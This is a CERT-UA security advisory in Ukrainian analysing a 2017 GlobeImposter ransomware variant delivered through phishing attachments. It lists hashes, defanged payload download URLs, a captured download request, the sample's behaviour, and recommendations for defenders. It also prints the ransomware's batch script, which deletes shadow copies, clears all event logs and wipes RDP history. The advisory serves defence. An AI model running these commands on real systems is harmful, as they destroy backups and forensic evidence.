Наші новини


Дізнайтеся першими про результати нашої роботи та останні новини
в сфері інформаційної безпеки

bg_header2.jpg

13.09.2017 CERT-UA повідомлено про спроби розповсюдження в українському сегменті мережі Інтернет повідомлень із шкідливим програмним забезпечення, яке є оновленою версією GlobeInposter Ransomware.

Спеціалістами CERT-UA проаналізовано файл, який надходив в прикріпленні до повідомлення.

[Довіреність_нa_выписку_Рабчук_Иван.7z]
md5: 48226ab07826b6873e672767a3fa2b21
https://www.virustotal.com/#/file/83b63bc383249993dffe113a41ba900d65edff54e4747b8fa382701ec4bbe8f8/detection
Даний заархівований файл виступав в якості завантажувача та містив в собі обфускований javascript код ДОВІРЕНІСТЬ.js.
[ДОВІРЕНІСТЬ.js]
md5: 027aa379bac6f35ecf826b0b56da9032
https://www.virustotal.com/#/file/6988634f53d86c798462f90b2e32d7619477c88ae93d2d1cd2443331629c55f2/detection
Скрипт, при наявності дозволу на виконання js файлів на комп’ютері, завантажує svc.exe.
svc.exe файл позиціонується як Trojan.Win32.Filecoder.
md5: 861e0824b4515b0a9afa19da3a0cd908
https://www.virustotal.com/#/file/927e2a0e67eb309007d2e1b8d0e7738e6462afe48f289e36d2827c7787f7e2ba/detection

Файл завантажується з наступних джерел:

  • hxxp://poperediylimitkv.com/hiloddfvnc/svc.exe
  • hxxp://book-house.org/html/files/image/svc.exe
  • hxxp://vkmodule.com.ua/images/svc.exe
            ===================
            [Received new connection on port: 80.]
            [New request on port 80.]
            GET /html/files/image/svc.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .N
            ET CLR 2.0.50727; .NET4.0C; .NET4.0E)
            Host: book-house.org
            Connection: Keep-Alive
            ======================
        

та запускає його виконання за допомогою команди Exec після визначення дати на інфікованому комп’ютері, яка не повинна бути більша за 29.10.2017.

Даний тип шифрувальника розповсюджується через поширення листів, використовуючи соціальну інженерію. Поширення по локальній мережі поки що не зафіксовано.

Виявлено, що шифрувальник файлів не функціонує, якщо в системі немає бібліотеки msxml2.dll.

Виконання svc.exe файлу.
Svc.exe під час виконання самозмінюється в програму ./svc_modificated.exe
MD5:a634a68e7d2e28cf640915474745dc1f

Файл-шифрувальник експлуатує вразливість CVE-2017-0263 для підвищення привилегій.

Основною функціональністю svc_modificated.exe є шифрування файлів кореневого каталогу диску С та D. Під час виконання цього файлу опрацьовується наступне:

  • для вибору файлів для шифрування відкидаються такі директорії:
    Windows Defender,Internet Explorer,Kaspersky Lab,McAfee,Avira,Avast,Dr.Web,Symantec та
    Symantec_Client_Security,spytech software,COMODO,
    Windows,.Microsoft.Microsoft Help,Windows App Certification Kit
    Windows NT,Windows Kits,Windows Mail,
    Windows Media Player,Windows Multimedia Platform,
    Windows Phone Kits,Windows Phone Silverlight Kits,
    Windows Photo Viewer,Windows Portable Devices,Windows Sidebar
    NVIDIA Corporation,Microsoft.NET,
    Outlook Express,Movie Maker ,Chrome,Mozilla Firefox ,Opera,YandexBrowser,
    ntldr,Internet Explorer
  • ігноруються файли з розширенням:
    .$er,.4db,.4dd,.4d,.4mp,.abs,.abx,.accdb,.accdc
    .accdb,.accdc,.accde,.accdr,.accdt,.accdw,.accft,.awdb
    .clkw,.daconnections,.dacpac,.dadiagrams,.daschema,.db-shm,.db-wa,.dtsx,.fmp12,.fmps,.itdb,.mdbhtm,.rctd,.sqlite,.sqlite3,.sqlitedb,.teacher,.wmdb,.xlgc
  • використовується запис в регістр для запуску
    /Software/Microsoft/Windows/CurrentVersion/RunOnce
  • створюється в кореневому каталозі С файл-попередження про вимагання біткойнів або грошовий еквівалент в гривнях. PAXYHOK.html
  • генеруються RSA Encryption ключ для шифрування файлів з sha224 та sha225
  • щоб унеможливити відновлення зашифрованих файлів виконує скрипт та знищує всі події з лог файлів які містять значення «25a2»
    @echo off
    vssadmin.exe Delete Shadows /All /Quiet
    reg delete «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default» /va /f
    reg delete «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers» /f
    reg add «HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers»
    cd %userprofile%\documents\
    attrib Default.rdp -s -h
    del Default.rdp
    for /F «tokens=*» 25a2 in (‘wevtutil.exe el’) DO wevtutil.exe cl «25a2»
  • змінює атрибути доступу до файлів з метою шифрувння
  • вбиває процеси outlook, postgre, excel

Перелік індикаторів компрометації:
027aa379bac6f35ecf826b0b56da9032 ДОВІРЕНІСТЬ.js
48226ab07826b6873e672767a3fa2b21 Довіреність_нa_выписку_Рабчук_Иван.7z
861e0824b4515b0a9afa19da3a0cd908 svc.exe

Рекомендації CERT—UA:

  1. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
  2. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
  3. Установити патч який виправляє вразливість CVE-2017-0263
    https://portal.msrc.microsoft.com/en-US/security-guidance
  4. Не працювати під правами адміна.
  5. Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
  6. Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.

Повідомити про інцидент